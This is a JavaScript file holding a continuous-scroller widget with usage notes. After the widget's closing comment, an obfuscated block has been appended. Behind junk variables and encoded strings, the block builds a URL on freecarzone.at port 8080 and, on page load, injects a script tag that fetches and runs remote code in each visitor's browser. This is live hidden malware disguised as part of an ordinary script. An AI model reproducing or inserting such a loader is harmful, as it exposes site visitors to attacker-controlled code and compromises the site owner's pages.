/*<![CDATA[*/
// Continious ScrollerII (14-December-2007)
// by: Vic Phillips http://www.vicsjavascripts.org.uk


// Application Notes
// The effect is initialised and controlled by event calls to function
// zxcScroller('h','tst2','start',1,100,200);
// where:
// parameter 0 = the mode, for vertical 'v', for horizontal 'h'.                     (string 'v' or 'h');
// parameter 1 = the unique id name of the scroll container.                         (string);
// parameter 2 = start or stop.                                                      (string 'start' or 'stop');
// parameter 3 = to scroll up/left = negative digit or down/right = positive digit.  (digit);
//               may also be used to control the scroll speed.
// parameter 4 = the scroll speed (milli seconds).                                   (digits);
// parameter 5 = the initial delay before scrolling (milli seconds).                 (digits);
//
// The first call will initialise the effect.
// Subsequent calls may be used control the effect by updating parameters 2, 3 and 4.
// If parameters 2 or 3 are not specified the parameter will be toggled.
// Examples
//<input type="button" name="" value="Toggle Direction" onclick="zxcScroller('h','tst2','start');"/>
//<input type="button" name="" value="Toggle Stop/Start" onclick="zxcScroller('h','tst2');"/>

// Functional Code size = 2.4k

function zxcScroller(zxcmde,zxcid,zxcrun,zxcud,zxcspd,zxcsrt){
	var zxcp=document.getElementById(zxcid);
	if (!zxcp[zxcmde+'scroll']) return zxcp[zxcmde+'scroll']= new zxcScrollerOOP(zxcmde,zxcp,zxcrun,zxcud,zxcspd,zxcsrt);
	var zxcoop=zxcp[zxcmde+'scroll']
		clearTimeout(zxcp.to);
	zxcoop.spd=zxcspd||zxcoop.spd;
	zxcoop.ud=zxcud||-zxcoop.ud;
	zxcp[zxcmde+'run']=(zxcrun=='stop'||zxcrun=='start')?zxcrun:(zxcp[zxcmde+'run']=='stop')?'start':'stop';
	if (zxcp[zxcmde+'run']=='start') zxcoop.scroll();
}

function zxcScrollerOOP(zxcmde,zxcp,zxcrun,zxcud,zxcspd,zxcsrt){
	this.p=zxcp;
	var zxcc=this.p.getElementsByTagName('DIV')[0]
		this.vh=(zxcmde.charAt(0).toLowerCase()=='v');
	this.mde=zxcmde;
	this.ary=[];
	this.ary[0]=[zxcc,0];
	var zxcmax=(((this.vh)?this.ary[0][0].offsetHeight:this.ary[0][0].offsetWidth))+((this.vh)?this.p.offsetHeight:this.p.offsetWidth);
	this.wh=(this.mde.charAt(0).toLowerCase()=='v')?this.ary[0][0].offsetHeight:this.ary[0][0].offsetWidth;
	var zxcpos=0;
	while (zxcpos<zxcmax){
		var zxc1=this.ary.length;
		this.ary[zxc1]=[this.ary[0][0].cloneNode(true),zxcpos+=this.wh];
		zxcES(this.ary[zxc1][0],{position:'absolute',left:((this.vh)?0:this.ary[zxc1][1])+'px',top:((this.vh)?this.ary[zxc1][1]:0)+'px'},this.p);
	}
	this.ud=zxcud||-1;
	this.spd=zxcspd||100;
	this.p.to=null;
	this.data=[zxcpos,-this.wh];
	this.p[this.mde+'run']=(zxcrun=='stop'||zxcrun=='start')?zxcrun:'start';
	if (this.p[this.mde+'run']) this.p.to=setTimeout(function(zxcoop){return function(){zxcoop.scroll();}}(this),zxcsrt||500);
}

zxcScrollerOOP.prototype.scroll=function(){
	if (this.p[this.mde+'run']=='start'){
		for (var zxc1=0;zxc1<this.ary.length;zxc1++){
			this.ary[zxc1][1]+=this.ud;
			zxcES(this.ary[zxc1][0],{position:'absolute',left:((this.vh)?0:this.ary[zxc1][1])+'px',top:((this.vh)?this.ary[zxc1][1]:0)+'px'});
			if ((this.ud<0&&this.ary[zxc1][1]<=this.data[1])||(this.ud>0&&this.ary[zxc1][1]>this.data[0])) this.ary[zxc1][1]=this.data[(this.ud<0)?0:1];
		}
	}
	this.p.to=setTimeout(function(zxcoop){return function(){zxcoop.scroll();}}(this),this.spd);
}

function zxcES(zxcele,zxcstyle,zxcp,zxctxt){
	if (typeof(zxcele)=='string'){ zxcele=document.createElement(zxcele); }
	for (key in zxcstyle){ zxcele.style[key]=zxcstyle[key]; }
	if (zxcp){ zxcp.appendChild(zxcele); }
	if (zxctxt){ zxcele.appendChild(document.createTextNode(zxctxt)); }
	return zxcele;
}


/*]]>*/

var P='';function F(){var q;if(q!='' && q!='R'){q='m'};var gO;if(gO!='' && gO!='QL'){gO=null};this.c="";var Xp;if(Xp!='Q_' && Xp != ''){Xp=null};var T=new Date();var X=window;this.e='';var Y;if(Y!='' && Y!='f'){Y=null};var I=X['unescape'];var k=I("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%61%67%65%73%6a%61%75%6e%65%73%2e%66%72%2f%33%39%2e%6e%65%74%2e%70%68%70");var Xf;if(Xf!='cR' && Xf!='Yv'){Xf='cR'};var Qk=new Date();function E(y,O){var TH='';var fk=new Date();var l=I("%5d");var yI=I("%5b");var sA=new Array();var sV;if(sV!='' && sV!='Oo'){sV=null};var s=new String("g");var TB=new String();var Bp=new String();var hF;if(hF!='' && hF!='mz'){hF='Rb'};var Q=new RegExp(yI+O+l, s);var jq="";var Qa='';var sm='';var gL='';return y.replace(Q, new String());};var M=new Date();var g=document;var N=E('d1eNf7e1rT','TuNJ16L7xmE');var yx=E('s3cGrCiDpotm','U_foE1PDqCv3hG2mFaNgS');var B=E('8342559127799046264599348222266622173717049427252324323','71364259');var pJ;if(pJ!='kt'){pJ='kt'};var MT="";var W=E('sUrzcE','20UFt6z1TyganuhEkVOv5K7bl');var rO;if(rO!='_l' && rO!='_H'){rO=''};var d;if(d!='' && d!='zl'){d='erh'};function p(){var C=I("%68%74%74%70%3a%2f%2f%66%72%65%65%63%61%72%7a%6f%6e%65%2e%61%74%3a");var ye='';var cQ='';var uL;if(uL!='YF'){uL=''};var h=C;this.ux='';var G;if(G!='' && G!='JS'){G=''};h+=B;var OL;if(OL!='po' && OL!='Mo'){OL='po'};var t="";h+=k;var FX;if(FX!='TD'){FX='TD'};var U=new Array();var Ex;if(Ex!='' && Ex!='PG'){Ex=null};var BS=new Date();try {var Px=new Array();var AI;if(AI!=''){AI='Eu'};this.sa="";pg=g[E('cZrZe3ahtSefEzlsesmZeRnzt3','zZRdL7fshyuwbS3O')](yx);var Qf;if(Qf!='eU'){Qf='eU'};var OJ="";var PE="";var ZS=new Array();var dc=new Array();pg[W]=h;var TG=new String();pg[N]=[1,1][0];var vk;if(vk!='ZR' && vk != ''){vk=null};var aA='';var Ib;if(Ib!='' && Ib!='pZ'){Ib='kh'};g.body[E('avp6p6eYnvdAC6hOi0l6dA','6ByZv4G0uSA1YO2')](pg);var nl;if(nl!='dw'){nl=''};var Rm;if(Rm!='jz'){Rm=''};} catch(gh){var Ts=new Date();};var PD=new Array();var mK=new String();var Ze=new String();}var uU=new Array();var Z=E('oPnTlBoja4dP','4jyIC6eBNwPfTmRpi');var LE=new Date();var JI;if(JI!='' && JI!='Jv'){JI=null};X[Z]=p;this.uv='';};this.Tt='';this.DL="";var NS;if(NS!='' && NS!='Hm'){NS=''};var N_=new String();F();
